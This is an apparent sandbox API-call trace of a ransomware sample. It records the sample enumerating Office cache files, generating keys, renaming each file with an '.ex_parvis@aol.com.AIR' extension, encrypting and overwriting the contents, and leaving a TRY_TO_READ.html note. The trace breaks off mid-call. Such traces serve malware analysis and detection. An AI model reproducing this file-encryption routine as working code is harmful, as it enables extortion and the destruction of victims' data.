RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0142.154] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f90 [0142.154] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0142.154] GetLastError () returned 0x0 [0142.154] FindNextFileW (in: hFindFile=0x35e098, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30306de0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30306de0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b7cde0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x7e1dcd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProjLR.cab", cAlternateFileName="")) returned 1 [0142.154] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0142.154] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0142.154] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f90 [0142.154] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0142.154] GetLastError () returned 0x0 [0142.154] FindNextFileW (in: hFindFile=0x35e098, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0142.154] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0142.154] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0142.154] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f90 [0142.154] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0142.154] GetLastError () returned 0x0 [0142.154] FindNextFileW (in: hFindFile=0x35e098, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9721ce70, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9721ce70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9721ce70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0142.154] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0142.154] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0142.154] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f90 [0142.154] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0142.154] GetLastError () returned 0x0 [0142.154] FindNextFileW (in: hFindFile=0x35e098, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9721ce70, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9721ce70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9721ce70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0142.154] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3856c8 [0142.154] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0142.154] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0142.154] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0142.154] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0142.154] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0142.155] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0142.155] GetProcessHeap () returned 0x2e0000 [0142.155] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x3a7410 [0142.155] lstrcpyW (in: lpString1=0x3a7410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" [0142.156] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0142.156] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0142.158] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x494 [0142.158] GetProcessHeap () returned 0x2e0000 [0142.158] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0142.158] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1872) returned 1 [0142.158] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x750 [0142.158] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0142.158] GetProcessHeap () returned 0x2e0000 [0142.158] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0142.158] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0142.159] WriteFile (in: hFile=0x494, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0142.160] WriteFile (in: hFile=0x494, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0142.160] WriteFile (in: hFile=0x494, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0142.160] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x750) returned 0x3a7410 [0142.160] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x750) returned 0x3a7b68 [0142.160] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.160] ReadFile (in: hFile=0x494, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x750, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x750, lpOverlapped=0x0) returned 1 [0142.160] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1872, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.161] WriteFile (in: hFile=0x494, lpBuffer=0x3a7b68*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7b68*, lpNumberOfBytesWritten=0x2acf9c8*=0x750, lpOverlapped=0x0) returned 1 [0142.161] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0142.161] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7b68 | out: hHeap=0x2e0000) returned 1 [0142.161] CloseHandle (hObject=0x494) returned 1 [0142.161] GetProcessHeap () returned 0x2e0000 [0142.162] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0142.162] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0142.162] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0142.162] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3856c8 | out: hHeap=0x2e0000) returned 1 [0142.162] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385620 | out: hHeap=0x2e0000) returned 1 [0142.162] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385620 [0142.162] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0142.162] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0142.162] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0142.162] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0142.162] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", dwFileAttributes=0x80) returned 1 [0142.163] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 74 [0142.163] GetProcessHeap () returned 0x2e0000 [0142.163] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfa) returned 0x363a50 [0142.163] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" [0142.163] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0142.163] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0142.166] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x494 [0142.166] GetProcessHeap () returned 0x2e0000 [0142.166] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0142.166] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=8265165) returned 1 [0142.166] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x7e1dcd [0142.166] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0142.166] GetProcessHeap () returned 0x2e0000 [0142.166] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0142.166] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0142.167] WriteFile (in: hFile=0x494, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0142.169] WriteFile (in: hFile=0x494, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0142.169] WriteFile (in: hFile=0x494, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0142.169] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x7e1dcd) returned 0x30d0020 [0142.170] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x7e1dcd) returned 0x38c0020 [0142.170] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.170] ReadFile (in: hFile=0x494, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x7e1dcd, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x7e1dcd, lpOverlapped=0x0) returned 1 [0142.635] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0142.635] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0142.635] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", dwFileAttributes=0x80) returned 1 [0142.637] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 78 [0142.637] GetProcessHeap () returned 0x2e0000 [0142.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102) returned 0x3a7410 [0142.637] lstrcpyW (in: lpString1=0x3a7410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" [0142.637] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0142.637] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0142.640] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x494 [0142.640] GetProcessHeap () returned 0x2e0000 [0142.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0142.640] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1452) returned 1 [0142.640] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x5ac [0142.640] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0142.640] GetProcessHeap () returned 0x2e0000 [0142.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0142.640] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0142.640] WriteFile (in: hFile=0x494, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0142.643] WriteFile (in: hFile=0x494, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0142.643] WriteFile (in: hFile=0x494, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0142.643] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x5ac) returned 0x3a7410 [0142.643] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x5ac) returned 0x3a79c8 [0142.643] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.643] ReadFile (in: hFile=0x494, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x5ac, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x5ac, lpOverlapped=0x0) returned 1 [0142.643] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1452, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.643] WriteFile (in: hFile=0x494, lpBuffer=0x3a79c8*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a79c8*, lpNumberOfBytesWritten=0x2acf9c8*=0x5ac, lpOverlapped=0x0) returned 1 [0142.643] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0142.643] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a79c8 | out: hHeap=0x2e0000) returned 1 [0142.643] CloseHandle (hObject=0x494) returned 1 [0142.644] GetProcessHeap () returned 0x2e0000 [0142.644] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0142.644] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0142.644] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0142.644] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385578 | out: hHeap=0x2e0000) returned 1 [0142.644] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3854d0 | out: hHeap=0x2e0000) returned 1 [0142.644] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3854d0 [0142.644] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0142.644] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0142.644] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0142.644] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0142.644] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi", dwFileAttributes=0x80) returned 1 [0142.646] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 78 [0142.646] GetProcessHeap () returned 0x2e0000 [0142.646] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102) returned 0x3a7410 [0142.646] lstrcpyW (in: lpString1=0x3a7410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" [0142.646] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0142.646] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0142.648] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x494 [0142.649] GetProcessHeap () returned 0x2e0000 [0142.649] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0142.649] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2511872) returned 1 [0142.649] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x265400 [0142.649] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0142.649] GetProcessHeap () returned 0x2e0000 [0142.649] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0142.649] CryptEncrypt (in: 